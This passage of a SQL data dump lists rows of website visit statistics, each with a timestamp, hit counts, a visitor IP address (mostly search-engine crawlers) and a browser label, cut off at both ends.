','chrome'),(441200,1565461452,3,3,0,0,'66.249.66.218','chrome'),(441201,1565461812,1,1,0,0,'157.55.39.212','other'),(441202,1565462052,1,1,0,0,'66.249.66.130','chrome'),(441203,1565462134,2,2,0,0,'66.249.66.222','chrome'),(441204,1565463049,4,4,0,0,'66.249.66.218','chrome'),(441205,1565463412,3,3,0,0,'157.55.39.212','other'),(441206,1565463502,1,1,0,0,'66.249.66.220','chrome'),(441207,1565464465,2,2,0,0,'66.249.66.218','chrome'),(441208,1565464905,2,2,0,0,'207.46.13.185','other'),(441209,1565465213,1,1,0,0,'8.29.198.26','other'),(441210,1565465716,4,4,0,0,'66.249.66.218','chrome'),(441211,1565465898,1,1,0,0,'66.249.66.128','chrome'),(441212,1565466144,1,0,1,0,'66.249.66.220',''),(441213,1565466382,1,1,0,0,'157.55.39.212','other'),(441214,1565466874,1,1,0,0,'141.8.188.11','other'),(441215,1565467142,1,1,0,0,'66.249.66.222','chrome'),(441216,1565467474,3,3,0,0,'66.249.66.218','chrome'),(441217,1565467536,1,1,0,0,'8.29.198.26','other'),(441218,1565467722,1,1,0,0,'66.249.66.220','chrome'),(441219,1565468178,1,1,0,0,'207.46.13.104','other'),(441220,1565469210,1,1,0,0,'66.249.66.220','chrome'),(441221,1565469578,1,1,0,0,'207.46.13.185','other'),(441222,1565470345,1,1,0,0,'40.77.167.46','other'),(441223,1565470355,1,1,0,0,'157.55.39.212','other'),(441224,1565471128,1,1,0,0,'139.59.92.57','firefox'),(441225,1565471143,2,2,0,0,'66.249.66.218','chrome'),(441226,1565471337,3,3,0,0,'66.249.66.128','chrome'),(441227,1565471529,2,2,0,0,'207.46.13.104','other'),(441228,1565471607,2,2,0,0,'66.249.66.220','chrome'),(441229,1565472370,1,1,0,0,'66.249.66.128','chrome'),(441230,1565472590,2,2,0,0,'66.249.66.220','chrome'),(441231,1565472618,1,1,0,0,'157.55.39.212','other'),(441232,1565473200,1,1,0,0,'66.249.66.218','chrome'),(441233,1565473218,1,1,0,0,'207.46.13.185','other'),(441234,1565473436,1,1,0,0,'5.45.207.79','other'),(441235,1565473723,1,1,0,0,'66.249.66.220','chrome'),(441236,1565473801,2,2,0,0,'66.249.66.222','chrome'),(441237,1565473924,1,1,0,0,'141.8.188.11','other'),(441238,1565474287,1,1,0,0,'5.45.207.8','other'),(441239,1565474307,4,4,0,0,'66.249.66.218','chrome'),(441240,1565475471,1,1,0,0,'66.249.66.128','chrome'),(441241,1565475877,2,2,0,0,'66.249.66.222','chrome'),(441242,1565476079,1,1,0,0,'8.29.198.27','other'),(441243,1565476098,1,1,0,0,'40.77.167.46','other'),(441244,1565476337,3,3,0,0,'66.249.66.218','chrome'),(441245,1565476620,2,2,0,0,'66.249.66.220','chrome'),(441246,1565476741,1,1,0,0,'66.249.66.130','chrome'),(441247,1565477422,1,1,0,0,'207.46.13.183','other'),(441248,1565478168,1,1,0,0,'207.46.13.107','other'),(441249,1565478389,1,1,0,0,'8.29.198.26','other'),(441250,1565478399,1,1,0,0,'141.8.188.11','other'),(441251,1565478497,1,1,0,0,'66.249.66.218','chrome'),(441252,1565478897,2,2,0,0,'66.249.66.220','chrome'),(441253,1565479342,2,2,0,0,'66.249.66.222','chrome'),(441254,1565479730,2,2,0,0,'141.8.188.11','other'),(441255,1565479837,2,2,0,0,'40.77.167.46','other'),(441256,1565480041,1,1,0,0,'207.46.13.104','other'),(441257,1565480562,3,3,0,0,'66.249.66.222','chrome'),(441258,1565481427,3,3,0,0,'66.249.66.220','chrome'),(441259,1565481512,1,1,0,0,'141.8.188.11','other'),(441260,1565481515,1,1,0,0,'141.8.188.29','other'),(441261,1565481578,4,4,0,0,'66.249.66.218','chrome'),(441262,1565481606,1,1,0,0,'207.46.13.56','other'),(441263,1565482449,1,1,0,0,'66.249.66.220','chrome'),(441264,1565482903,1,1,0,0,'40.77.167.46','other'),(441265,1565482911,1,1,0,0,'141.8.188.29','other'),(441266,1565482952,1,1,0,0,'66.249.66.218','chrome'),(441267,1565483281,1,1,0,0,'66.249.66.132','chrome'),(441268,1565483312,2,2,0,0,'66.249.66.222','chrome'),(441269,1565484008,1,1,0,0,'66.249.66.220','chrome'),(441270,1565484326,2,2,0,0,'157.55.39.91','other'),(441271,1565484572,1,1,0,0,'66.249.66.132','chrome'),(441272,1565484986,2,2,0,0,'66.249.66.220','chrome'),(441273,1565485086,3,3,0,0,'66.249.66.218','chrome'),(441274,1565485246,1,1,0,0,'207.46.13.183','other'),(441275,1565485660,1,1,0,0,'66.249.66.128','chrome'),(441276,1565485760,2,2,0,0,'66.249.66.222','chrome'),(441277,1565486218,1,1,0,0,'66.249.66.220','chrome'),(441278,1565486488,1,1,0,0,'66.249.66.218','chrome'),(441279,1565486721,3,3,0,0,'66.249.66.222','chrome'),(441280,1565486792,2,2,0,0,'66.249.66.130','chrome'),(441281,1565486927,1,1,0,0,'8.29.198.26','other'),(441282,1565487000,1,1,0,0,'207.46.13.183','other'),(441283,1565487207,1,1,0,0,'66.249.66.220','chrome'),(441284,1565488173,2,2,0,0,'66.249.66.218','chrome'),(441285,1565488312,1,1,0,0,'157.55.39.91','other'),(441286,1565488389,2,2,0,0,'40.77.167.145','other'),(441287,1565488536,4,4,0,0,'66.249.66.220','chrome'),(441288,1565488893,2,2,0,0,'207.46.13.183','other'),(441289,1565489070,1,1,0,0,'66.249.66.222','chrome'),(441290,1565489225,1,1,0,0,'8.29.198.26','other'),(441291,1565489269,1,1,0,0,'66.249.66.132','chrome'),(441292,1565489490,1,1,0,0,'141.8.188.11','other'),(441293,1565489540,1,1,0,0,'66.249.66.130','chrome'),(441294,1565489570,2,2,0,0,'66.249.66.220','chrome'),(441295,1565489802,1,1,0,0,'66.249.66.128','chrome'),(441296,1565490488,3,3,0,0,'66.249.66.222','chrome'),(441297,1565490535,1,1,0,0,'157.55.39.91','other'),(441298,1565490546,2,2,0,0,'66.249.66.220','chrome'),(441299,1565490574,1,1,0,0,'87.250.224.65','other'),(441300,1565490580,3,3,0,0,'66.249.66.218','chrome'),(441301,1565491464,3,3,0,0,'66.249.66.130','chrome'),(441302,1565491594,1,1,0,0,'5.45.207.80','other'),(441303,1565491633,1,1,0,0,'66.249.66.222','chrome'),(441304,1565491650,1,1,0,0,'128.72.182.199','msie'),(441305,1565491696,1,1,0,0,'66.249.66.128','chrome'),(441306,1565492077,1,1,0,0,'66.249.66.218','chrome'),(441307,1565492287,2,2,0,0,'66.249.66.132','chrome'),(441308,1565492671,1,1,0,0,'66.249.66.220','chrome'),(441309,1565493650,4,4,0,0,'66.249.66.222','chrome'),(441310,1565493857,1,1,0,0,'66.249.66.220','chrome'),(441311,1565494025,4,4,0,0,'66.249.66.218','chrome'),(441312,1565495153,2,2,0,0,'66.249.66.222','chrome'),(441313,1565495190,3,3,0,0,'66.249.66.220','chrome'),(441314,1565495334,3,3,0,0,'66.249.66.132','chrome'),(441315,1565495485,1,1,0,0,'157.55.39.214','other'),(441316,1565495717,4,4,0,0,'157.55.39.91','other'),(441317,1565495856,3,3,0,0,'66.249.66.218','chrome'),(441318,1565495886,1,1,0,0,'13.66.139.0','other'),(441319,1565495911,3,3,0,0,'66.249.66.128','chrome'),(441320,1565496239,1,1,0,0,'66.249.66.220','chrome'),(441321,1565496788,4,4,0,0,'66.249.66.218','chrome'),(441322,1565496834,1,1,0,0,'5.45.207.19','other'),(441323,1565497407,1,1,0,0,'157.55.39.91','other'),(441324,1565497428,1,1,0,0,'66.249.66.128','chrome'),(441325,1565497468,2,2,0,0,'66.249.66.220','chrome'),(441326,1565497477,1,1,0,0,'66.249.66.132','chrome'),(441327,1565497776,1,1,0,0,'8.29.198.26','other'),(441328,1565498144,1,1,0,0,'207.46.13.183','other'),(441329,1565498368,1,1,0,0,'157.55.39.235','other'),(441330,1565498794,2,2,0,0,'66.249.66.128','chrome'),(441331,1565499132,1,1,0,0,'66.249.66.132','chrome'),(441332,1565499199,5,5,0,0,'66.249.66.218','chrome'),(441333,1565499304,1,1,0,0,'193.106.30.99','chrome'),(441334,1565499448,2,2,0,0,'66.249.66.220','chrome'),(441335,1565500064,1,1,0,0,'8.29.198.25','other'),(441336,1565500552,2,2,0,0,'66.249.66.222','chrome'),(441337,1565500827,2,2,0,0,'66.249.66.220','chrome'),(441338,1565501158,1,1,0,0,'5.45.207.19','other'),(441339,1565501529,1,1,0,0,'66.249.66.218','chrome'),(441340,1565501541,2,2,0,0,'66.249.66.132','chrome'),(441341,1565501586,1,1,0,0,'66.249.66.128','chrome'),(441342,1565501764,1,1,0,0,'91.196.178.134','firefox'),(441343,1565502338,1,1,0,0,'109.70.100.29','other'),(441344,1565502447,1,1,0,0,'66.249.66.130','chrome'),(441345,1565502905,3,3,0,0,'66.249.66.222','chrome'),(441346,1565503115,1,1,0,0,'66.249.66.220','chrome'),(441347,1565503206,4,4,0,0,'66.249.66.218','chrome'),(441348,1565503363,1,1,0,0,'66.249.66.130','chrome'),(441349,1565504132,2,2,0,0,'66.249.66.222','chrome'),(441350,1565504440,1,1,0,0,'91.196.178.51','chrome'),(441351,1565504521,2,2,0,0,'66.249.66.132','chrome'),(441352,1565505157,1,1,0,0,'66.249.66.220','chrome'),(441353,1565505159,1,1,0,0,'157.55.39.214','other'),(441354,1565505290,2,2,0,0,'66.249.66.222','chrome'),(441355,1565505336,1,1,0,0,'66.249.66.218','chrome'),(441356,1565505710,1,1,0,0,'157.55.39.91','other'),(441357,1565506167,3,3,0,0,'66.249.66.220','chrome'),(441358,1565506337,1,1,0,0,'66.249.66.130','chrome'),(441359,1565506366,2,2,0,0,'66.249.66.218','chrome'),(441360,1565506666,1,1,0,0,'66.249.66.132','chrome'),(441361,1565506765,1,1,0,0,'157.55.39.214','other'),(441362,1565506883,1,1,0,0,'66.249.66.222','chrome'),(441363,1565507273,2,2,0,0,'66.249.66.218','chrome'),(441364,1565507847,1,1,0,0,'207.46.13.130','other'),(441365,1565507985,2,2,0,0,'207.46.13.222','other'),(441366,1565508151,1,1,0,0,'66.249.66.222','chrome'),(441367,1565508266,1,1,0,0,'157.55.39.235','other'),(441368,1565508512,2,2,0,0,'66.249.66.218','chrome'),(441369,1565508593,1,1,0,0,'66.249.66.220','chrome'),(441370,1565508623,1,1,0,0,'8.29.198.26','other'),(441371,1565508648,1,1,0,0,'141.8.188.29','other'),(441372,1565509284,1,1,0,0,'66.249.66.128','chrome'),(441373,1565509320,1,1,0,0,'66.249.66.222','chrome'),(441374,1565509383,1,1,0,0,'66.249.66.132','chrome'),(441375,1565509412,1,1,0,0,'66.249.76.123','chrome'),(441376,1565509424,1,1,0,0,'66.249.66.130','chrome'),(441377,1565509426,1,1,0,0,'66.249.66.218','chrome'),(441378,1565510641,1,1,0,0,'66.249.66.222','chrome'),(441379,1565510883,2,2,0,0,'66.249.66.220','chrome'),(441380,1565510899,1,1,0,0,'8.29.198.27','other'),(441381,1565511116,2,1,1,0,'66.249.66.130',''),(441382,1565511771,2,2,0,0,'66.249.66.222','chrome'),(441383,1565511936,2,2,0,0,'207.46.13.130','other'),(441384,1565511947,1,1,0,0,'66.249.66.132','chrome'),(441385,1565512172,3,3,0,0,'66.249.66.220','chrome'),(441386,1565512667,1,1,0,0,'157.55.39.235','other'),(441387,1565512673,1,1,0,0,'207.46.13.222','other'),(441388,1565512701,2,2,0,0,'157.55.39.214','other'),(441389,1565512728,1,1,0,0,'66.249.66.222','chrome'),(441390,1565512917,6,6,0,0,'66.249.66.218','chrome'),(441391,1565513174,1,1,0,0,'5.45.207.19','other'),(441392,1565514117,3,3,0,0,'66.249.66.132','chrome'),(441393,1565514843,2,2,0,0,'66.249.66.222','chrome'),(441394,1565514959,1,1,0,0,'141.8.188.29','other'),(441395,1565515202,1,1,0,0,'66.249.66.130','chrome'),(441396,1565515206,1,1,0,0,'37.9.113.103','other'),(441397,1565515466,1,1,0,0,'141.8.188.11','other'),(441398,1565515967,1,1,0,0,'66.249.66.222','chrome'),(441399,1565516397,1,1,0,0,'141.8.142.162','other'),(441400,1565516710,1,1,0,0,'66.249.66.218','chrome'),(441401,1565517111,1,1,0,0,'207.46.13.64','other'),(441402,1565517235,1,1,0,0,'66.249.66.128','chrome'),(441403,1565517776,2,2,0,0,'66.249.66.218','chrome'),(441404,1565518103,1,1,0,0,'157.55.39.105','other'),(441405,1565518107,1,1,0,0,'54.215.229.129','chrome'),(441406,1565518113,1,1,0,0,'54.183.112.134','chrome'),(441407,1565518114,9,9,0,0,'13.56.139.95','chrome'),(441408,1565518188,1,1,0,0,'109.74.154.72','chrome'),(441409,1565518398,2,2,0,0,'66.249.66.220','chrome'),(441410,1565519074,1,1,0,0,'66.249.66.222','chrome'),(441411,1565519195,1,1,0,0,'95.108.181.75','other'),(441412,1565519455,1,1,0,0,'111.202.101.69','other'),(441413,1565519474,1,1,0,0,'8.29.198.26','other'),(441414,1565519760,2,2,0,0,'66.249.66.132','chrome'),(441415,1565520143,1,1,0,0,'213.180.203.40','other'),(441416,1565520588,1,1,0,0,'5.45.207.19','other'),(441417,1565520626,3,3,0,0,'66.249.66.220','chrome'),(441418,1565520711,1,1,0,0,'157.55.39.105','other'),(441419,1565521736,1,1,0,0,'8.29.198.27','other'),(441420,1565522264,1,1,0,0,'95.108.213.50','other'),(441421,1565522292,1,1,0,0,'207.46.13.222','other'),(441422,1565522302,1,1,0,0,'87.250.224.47','other'),(441423,1565522663,1,1,0,0,'66.249.66.222','chrome'),(441424,1565522783,2,2,0,0,'141.8.142.81','other'),(441425,1565522831,1,1,0,0,'87.250.224.81','other'),(441426,1565522924,2,2,0,0,'66.249.66.218','chrome'),(441427,1565523299,1,1,0,0,'87.250.224.64','other'),(441428,1565523482,1,1,0,0,'207.46.13.222','other'),(441429,1565523663,1,1,0,0,'40.77.167.181','other'),(441430,1565523775,2,2,0,0,'66.249.66.220','chrome'),(441431,1565523830,1,1,0,0,'66.249.66.218','chrome'),(441432,1565524185,1,1,0,0,'141.8.188.21','other'),(441433,1565524979,1,1,0,0,'66.249.66.222','chrome'),(441434,1565525223,1,1,0,0,'207.46.13.64','other'),(441435,1565525249,4,4,0,0,'66.249.66.220','chrome'),(441436,1565525317,1,1,0,0,'66.249.66.132','chrome'),(441437,1565525392,1,1,0,0,'5.45.207.19','other'),(441438,1565525551,1,1,0,0,'66.249.66.218','chrome'),(441439,1565525613,1,1,0,0,'157.55.39.105','other'),(441440,1565526070,1,1,0,0,'207.46.13.222','other'),(441441,1565526354,1,1,0,0,'66.249.66.138','chrome'),(441442,1565526360,1,1,0,0,'213.180.203.48','other'),(441443,1565526493,3,3,0,0,'66.249.66.222','chrome'),(441444,1565526531,1,1,0,0,'66.249.66.136','chrome'),(441445,1565526554,1,1,0,0,'66.249.66.218','chrome'),(441446,1565526969,1,1,0,0,'40.77.167.181','other'),(441447,1565527689,1,1,0,0,'37.9.113.103','other'),(441448,1565527719,1,1,0,0,'95.108.181.83','other'),(441449,1565527796,2,2,0,0,'66.249.66.220','chrome'),(441450,1565527807,2,2,0,0,'66.249.66.222','chrome'),(441451,1565527885,2,2,0,0,'35.182.167.31','other'),(441452,1565528108,4,4,0,0,'66.249.66.218','chrome'),(441453,1565528110,1,1,0,0,'66.249.66.132','chrome'),(441454,1565528376,1,1,0,0,'5.45.207.19','other'),(441455,1565528397,1,1,0,0,'66.249.66.142','chrome'),(441456,1565528618,1,1,0,0,'95.108.181.75','other'),(441457,1565528788,2,2,0,0,'66.249.66.220','chrome'),(441458,1565529050,1,1,0,0,'66.249.66.132','chrome'),(441459,1565529110,8,8,0,0,'66.249.66.218','chrome'),(441460,1565529285,1,1,0,0,'141.8.188.21','other'),(441461,1565529613,1,1,0,0,'207.46.13.222','other'),(441462,1565529696,3,3,0,0,'66.249.66.220','chrome'),(441463,1565530337,1,1,0,0,'8.29.198.25','other'),(441464,1565530410,1,1,0,0,'49.235.198.166','other'),(441465,1565530498,1,1,0,0,'66.249.66.218','chrome'),(441466,1565530635,2,2,0,0,'66.249.66.220','chrome'),(441467,1565530820,1,1,0,0,'66.249.66.128','chrome'),(441468,1565531311,1,1,0,0,'66.249.66.222','chrome'),(441469,1565531475,1,1,0,0,'207.46.13.9','other'),(441470,1565531868,1,1,0,0,'66.249.66.128','chrome'),(441471,1565531964,2,2,0,0,'66.249.66.220','chrome'),(441472,1565532362,1,1,0,0,'141.8.142.81','other'),(441473,1565532427,1,1,0,0,'66.249.66.218','chrome'),(441474,1565532569,1,1,0,0,'8.29.198.25','other'),(441475,1565532827,1,1,0,0,'207.46.13.64','other'),(441476,1565532948,1,1,0,0,'157.55.39.105','other'),(441477,1565533161,2,2,0,0,'207.46.13.9','other'),(441478,1565533215,1,1,0,0,'66.249.66.222','chrome'),(441479,1565533294,1,1,0,0,'193.106.30.99','chrome'),(441480,1565533972,1,1,0,0,'66.249.66.220','chrome'),(441481,1565534642,2,2,0,0,'66.249.66.218','chrome'),(441482,1565534645,1,1,0,0,'91.196.178.70','firefox'),(441483,1565535153,1,1,0,0,'157.55.39.228','other'),(441484,1565535612,2,2,0,0,'66.249.66.128','chrome'),(441485,1565535649,1,1,0,0,'66.249.66.218','chrome'),(441486,1565535734,1,1,0,0,'66.249.66.222','chrome'),(441487,1565536349,3,3,0,0,'66.249.66.220','chrome'),(441488,1565536724,1,1,0,0,'207.46.13.64','other'),(441489,1565536807,3,3,0,0,'66.249.66.218','chrome'),(441490,1565536809,1,1,0,0,'66.249.66.132','chrome'),(441491,1565537096,4,4,0,0,'66.249.66.222','chrome'),(441492,1565537176,1,1,0,0,'66.249.66.128','chrome'),(441493,1565537366,1,1,0,0,'5.165.57.156','msie'),(441494,1565537660,5,5,0,0,'66.249.66.220','chrome'),(441495,1565537740,4,4,0,0,'66.249.66.218','chrome'),(441496,1565537786,1,1,0,0,'141.8.188.29','other'),(441497,1565539065,1,1,0,0,'66.249.66.218','chrome'),(441498,1565539142,2,2,0,0,'66.249.66.222','chrome'),(441499,1565539240,2,2,0,0,'66.249.66.220','chrome'),(441500,1565539588,1,1,0,0,'207.46.13.9','other'),(441501,1565540169,1,1,0,0,'77.74.177.113','chrome'),(441502,1565540199,1,1,0,0,'66.249.66.218','chrome'),(441503,1565541019,2,2,0,0,'66.249.66.220','chrome'),(441504,1565541185,1,1,0,0,'8.29.198.26','other'),(441505,1565541227,1,1,0,0,'66.249.66.128','chrome'),(441506,1565541846,1,1,0,0,'66.249.66.222','chrome'),(441507,1565541890,1,1,0,0,'157.55.39.88','other'),(441508,1565542052,1,1,0,0,'46.211.36.44','chrome'),(441509,1565542778,1,1,0,0,'66.249.66.220','chrome'),(441510,1565542949,1,1,0,0,'66.249.66.222','chrome'),(441511,1565543000,1,1,0,0,'66.249.66.128','chrome'),(441512,1565543234,1,1,0,0,'66.249.66.218','chrome'),(441513,1565543402,1,1,0,0,'8.29.198.27','other'),(441514,1565544136,1,1,0,0,'66.249.66.222','chrome'),(441515,1565545200,1,1,0,0,'66.249.66.222','chrome'),(441516,1565546008,1,1,0,0,'66.249.66.132','chrome'),(441517,1565546203,2,2,0,0,'66.249.66.130','chrome'),(441518,1565546411,2,2,0,0,'66.249.66.222','chrome'),(441519,1565546445,3,3,0,0,'66.249.66.218','chrome'),(441520,1565546588,1,1,0,0,'66.249.66.128','chrome'),(441521,1565546693,1,1,0,0,'40.77.167.176','other'),(441522,1565546749,1,1,0,0,'94.153.195.218','chrome'),(441523,1565547360,1,1,0,0,'66.249.66.220','chrome'),(441524,1565547474,1,1,0,0,'180.76.15.31','other'),(441525,1565547665,2,2,0,0,'66.249.66.218','chrome'),(441526,1565548590,1,1,0,0,'157.55.39.246','other'),(441527,1565549289,1,1,0,0,'207.46.13.31','other'),(441528,1565550036,3,3,0,0,'66.249.66.220','chrome'),(441529,1565550179,1,1,0,0,'66.249.66.222','chrome'),(441530,1565550204,6,6,0,0,'66.249.66.218','chrome'),(441531,1565550290,1,1,0,0,'66.249.66.132','chrome'),(441532,1565550704,2,2,0,0,'66.249.66.130','chrome'),(441533,1565551134,3,3,0,0,'66.249.66.220','chrome'),(441534,1565551209,3,3,0,0,'66.249.66.218','chrome'),(441535,1565551806,1,1,0,0,'66.249.66.132','chrome'),(441536,1565551846,3,3,0,0,'66.249.66.130','chrome'),(441537,1565551916,2,2,0,0,'66.249.66.222','chrome'),(441538,1565552031,1,1,0,0,'8.29.198.25','other'),(441539,1565552134,1,1,0,0,'66.249.66.128','chrome'),(441540,1565552516,3,3,0,0,'66.249.66.218','chrome'),(441541,1565552557,1,1,0,0,'66.249.66.220','chrome'),(441542,1565552844,1,1,0,0,'66.249.66.132','chrome'),(441543,1565554243,1,1,0,0,'8.29.198.25','other'),(441544,1565554505,1,1,0,0,'157.55.39.246','other'),(441545,1565555285,3,3,0,0,'66.249.66.220','chrome'),(441546,1565555666,1,1,0,0,'66.249.66.132','chrome'),(441547,1565556064,1,1,0,0,'157.55.39.186','other'),(441548,1565556101,1,1,0,0,'157.55.39.88','other'),(441549,1565556361,1,1,0,0,'157.55.39.246','other'),(441550,1565556741,1,1,0,0,'66.249.66.220','chrome'),(441551,1565557270,1,1,0,0,'66.249.66.132','chrome'),(441552,1565557399,2,2,0,0,'66.249.66.130','chrome'),(441553,1565557621,1,1,0,0,'176.98.25.140','firefox'),(441554,1565558105,1,1,0,0,'66.249.66.128','chrome'),(441555,1565558209,2,2,0,0,'66.249.66.218','chrome'),(441556,1565558463,1,1,0,0,'66.249.66.222','chrome'),(441557,1565558628,1,1,0,0,'66.249.66.220','chrome'),(441558,1565559211,2,2,0,0,'157.55.39.246','other'),(441559,1565559966,6,6,0,0,'66.249.66.218','chrome'),(441560,1565560137,3,3,0,0,'66.249.66.130','chrome'),(441561,1565560192,2,2,0,0,'66.249.66.132','chrome'),(441562,1565560200,1,1,0,0,'157.55.39.90','other'),(441563,1565560251,3,3,0,0,'66.249.66.220','chrome'),(441564,1565560316,3,3,0,0,'66.249.66.222','chrome'),(441565,1565561053,5,5,0,0,'66.249.66.218','chrome'),(441566,1565561753,1,1,0,0,'66.249.66.220','chrome'),(441567,1565561930,3,3,0,0,'157.55.39.88','other'),(441568,1565562487,2,2,0,0,'66.249.66.218','chrome'),(441569,1565562690,1,1,0,0,'66.249.66.222','chrome'),(441570,1565562743,2,2,0,0,'66.249.66.132','chrome'),(441571,1565562776,1,1,0,0,'66.249.66.128','chrome'),(441572,1565562874,1,1,0,0,'8.29.198.27','other'),(441573,1565563427,1,1,0,0,'176.14.37.74','msie'),(441574,1565563449,3,3,0,0,'66.249.66.218','chrome'),(441575,1565564363,1,1,0,0,'66.249.66.130','chrome'),(441576,1565564398,1,1,0,0,'66.249.66.218','chrome'),(441577,1565564650,1,1,0,0,'66.249.66.220','chrome'),(441578,1565565082,1,1,0,0,'8.29.198.26','other'),(441579,1565565754,2,2,0,0,'66.249.66.220','chrome'),(441580,1565566841,2,2,0,0,'66.249.66.222','chrome'),(441581,1565566974,1,1,0,0,'66.249.66.218','chrome'),(441582,1565566976,1,1,0,0,'91.209.11.236','other'),(441583,1565567098,4,4,0,0,'66.249.66.220','chrome'),(441584,1565567497,1,1,0,0,'66.249.66.128','chrome'),(441585,1565567598,1,1,0,0,'66.249.66.132','chrome'),(441586,1565567761,2,2,0,0,'66.249.66.222','chrome'),(441587,1565568623,1,1,0,0,'66.249.66.132','chrome'),(441588,1565568889,1,1,0,0,'157.55.39.90','other'),(441589,1565569022,1,1,0,0,'141.8.188.29','other'),(441590,1565569048,2,2,0,0,'141.8.188.11','other'),(441591,1565569088,1,1,0,0,'66.249.66.218','chrome'),(441592,1565569154,1,1,0,0,'66.249.66.130','chrome'),(441593,1565569316,1,1,0,0,'178.154.171.27','other'),(441594,1565569326,2,2,0,0,'66.249.66.222','chrome'),(441595,1565569402,1,1,0,0,'66.249.66.128','chrome'),(441596,1565569801,2,1,1,0,'66.249.66.220',''),(441597,1565570019,3,3,0,0,'66.249.66.218','chrome'),(441598,1565570066,1,1,0,0,'66.249.66.130','chrome'),(441599,1565570194,1,1,0,0,'141.8.188.29','other'),(441600,1565570448,1,1,0,0,'141.8.188.11','other'),(441601,1565571098,1,1,0,0,'66.249.66.218','chrome'),(441602,1565571263,1,1,0,0,'66.249.66.132','chrome'),(441603,1565571544,1,1,0,0,'66.249.66.220','chrome'),(441604,1565571904,1,1,0,0,'141.8.188.29','other'),(441605,1565572437,1,1,0,0,'40.77.167.210','other'),(441606,1565572806,1,1,0,0,'5.45.207.79','other'),(441607,1565572986,1,1,0,0,'66.249.66.220','chrome'),(441608,1565573295,2,2,0,0,'66.249.66.222','chrome'),(441609,1565573313,1,1,0,0,'66.249.66.130','chrome'),(441610,1565573527,1,1,0,0,'40.77.167.180','other'),(441611,1565573724,1,1,0,0,'8.29.198.27','other'),(441612,1565573751,1,1,0,0,'66.249.66.218','chrome'),(441613,1565573822,1,1,0,0,'87.250.224.81','other'),(441614,1565574432,1,1,0,0,'66.249.66.220','chrome'),(441615,1565575316,1,1,0,0,'141.8.188.11','other'),(441616,1565575413,2,2,0,0,'141.8.188.29','other'),(441617,1565575519,1,1,0,0,'157.55.39.186','other'),(441618,1565575931,1,1,0,0,'8.29.198.27','other'),(441619,1565576069,1,1,0,0,'66.249.66.220','chrome'),(441620,1565576508,2,2,0,0,'141.8.188.29','other'),(441621,1565576557,1,1,0,0,'40.77.167.180','other'),(441622,1565576657,2,2,0,0,'66.249.66.130','chrome'),(441623,1565576791,1,1,0,0,'141.8.188.11','other'),(441624,1565576797,1,1,0,0,'5.45.207.79','other'),(441625,1565577054,2,2,0,0,'66.249.66.220','chrome'),(441626,1565577199,3,3,0,0,'66.249.66.218','chrome'),(441627,1565577806,1,1,0,0,'141.8.188.29','other'),(441628,1565578007,1,1,0,0,'40.77.167.180','other'),(441629,1565578326,1,1,0,0,'66.249.66.132','chrome'),(441630,1565578579,1,1,0,0,'66.249.66.128','chrome'),(441631,1565578731,1,1,0,0,'181.215.75.45','other'),(441632,1565578828,1,1,0,0,'46.147.158.152','msie'),(441633,1565578872,2,2,0,0,'66.249.66.130','chrome'),(441634,1565578929,2,2,0,0,'66.249.66.218','chrome'),(441635,1565579558,1,1,0,0,'141.8.188.29','other'),(441636,1565579741,1,1,0,0,'66.249.66.222','chrome'),(441637,1565580626,1,1,0,0,'66.249.66.128','chrome'),(441638,1565581084,1,1,0,0,'66.249.66.222','chrome'),(441639,1565581098,1,1,0,0,'40.77.167.54','other'),(441640,1565581106,1,1,0,0,'157.55.39.73','other'),(441641,1565581359,2,2,0,0,'66.249.66.218','chrome'),(441642,1565582266,1,1,0,0,'66.249.66.218','chrome'),(441643,1565582475,2,2,0,0,'66.249.66.128','chrome'),(441644,1565582647,2,2,0,0,'40.77.167.9','other'),(441645,1565582901,2,2,0,0,'66.249.66.220','chrome'),(441646,1565583506,2,2,0,0,'66.249.66.218','chrome'),(441647,1565583608,1,1,0,0,'66.249.66.130','chrome'),(441648,1565583787,1,1,0,0,'141.8.188.29','other'),(441649,1565583835,2,2,0,0,'66.249.66.220','chrome'),(441650,1565583993,1,1,0,0,'141.8.188.11','other'),(441651,1565584427,4,4,0,0,'66.249.66.222','chrome'),(441652,1565584584,1,1,0,0,'8.29.198.27','other'),(441653,1565584858,2,2,0,0,'66.249.66.218','chrome'),(441654,1565584900,2,2,0,0,'66.249.66.128','chrome'),(441655,1565585156,1,1,0,0,'66.249.66.130','chrome'),(441656,1565585191,1,0,1,0,'87.98.145.188',''),(441657,1565585829,1,1,0,0,'141.8.188.11','other'),(441658,1565585860,1,1,0,0,'66.249.66.128','chrome'),(441659,1565586116,4,4,0,0,'141.8.188.29','other'),(441660,1565586544,1,1,0,0,'91.196.178.131','chrome'),(441661,1565586770,1,1,0,0,'8.29.198.25','other'),(441662,1565587250,1,1,0,0,'141.8.188.11','other'),(441663,1565587385,1,1,0,0,'66.249.66.218','chrome'),(441664,1565587423,1,1,0,0,'94.178.98.207','chrome'),(441665,1565587470,1,1,0,0,'40.77.167.63','other'),(441666,1565587773,2,2,0,0,'66.249.66.222','chrome'),(441667,1565587912,2,2,0,0,'141.8.188.29','other'),(441668,1565587948,1,1,0,0,'66.249.66.220','chrome'),(441669,1565588258,1,1,0,0,'66.249.66.130','chrome'),(441670,1565589168,3,3,0,0,'40.77.167.9','other'),(441671,1565589603,1,1,0,0,'66.249.66.220','chrome'),(441672,1565589665,1,1,0,0,'66.249.66.218','chrome'),(441673,1565590249,1,1,0,0,'13.66.139.0','other'),(441674,1565590422,2,2,0,0,'66.249.66.222','chrome'),(441675,1565590805,1,1,0,0,'46.164.130.94','chrome'),(441676,1565591177,1,1,0,0,'141.8.188.29','other'),(441677,1565591409,1,1,0,0,'66.249.66.128','chrome'),(441678,1565591496,2,2,0,0,'66.249.66.222','chrome'),(441679,1565591760,1,1,0,0,'40.77.167.63','other'),(441680,1565591850,1,1,0,0,'66.249.66.132','chrome'),(441681,1565592217,1,1,0,0,'46.164.130.94','chrome'),(441682,1565592437,1,1,0,0,'66.249.66.130','chrome'),(441683,1565593012,2,2,0,0,'66.249.66.218','chrome'),(441684,1565593767,2,2,0,0,'66.249.66.132','chrome'),(441685,1565593911,2,2,0,0,'66.249.66.220','chrome'),(441686,1565594577,1,1,0,0,'91.196.178.74','chrome'),(441687,1565594724,2,2,0,0,'157.55.39.81','other'),(441688,1565594728,1,1,0,0,'40.77.167.9','other'),(441689,1565594733,3,3,0,0,'40.77.167.63','other'),(441690,1565594739,1,1,0,0,'207.46.13.55','other'),(441691,1565594990,1,1,0,0,'66.249.66.220','chrome'),(441692,1565595007,2,2,0,0,'66.249.66.130','chrome'),(441693,1565595011,2,2,0,0,'66.249.66.218','chrome'),(441694,1565595390,2,2,0,0,'66.249.66.222','chrome'),(441695,1565595444,1,1,0,0,'8.2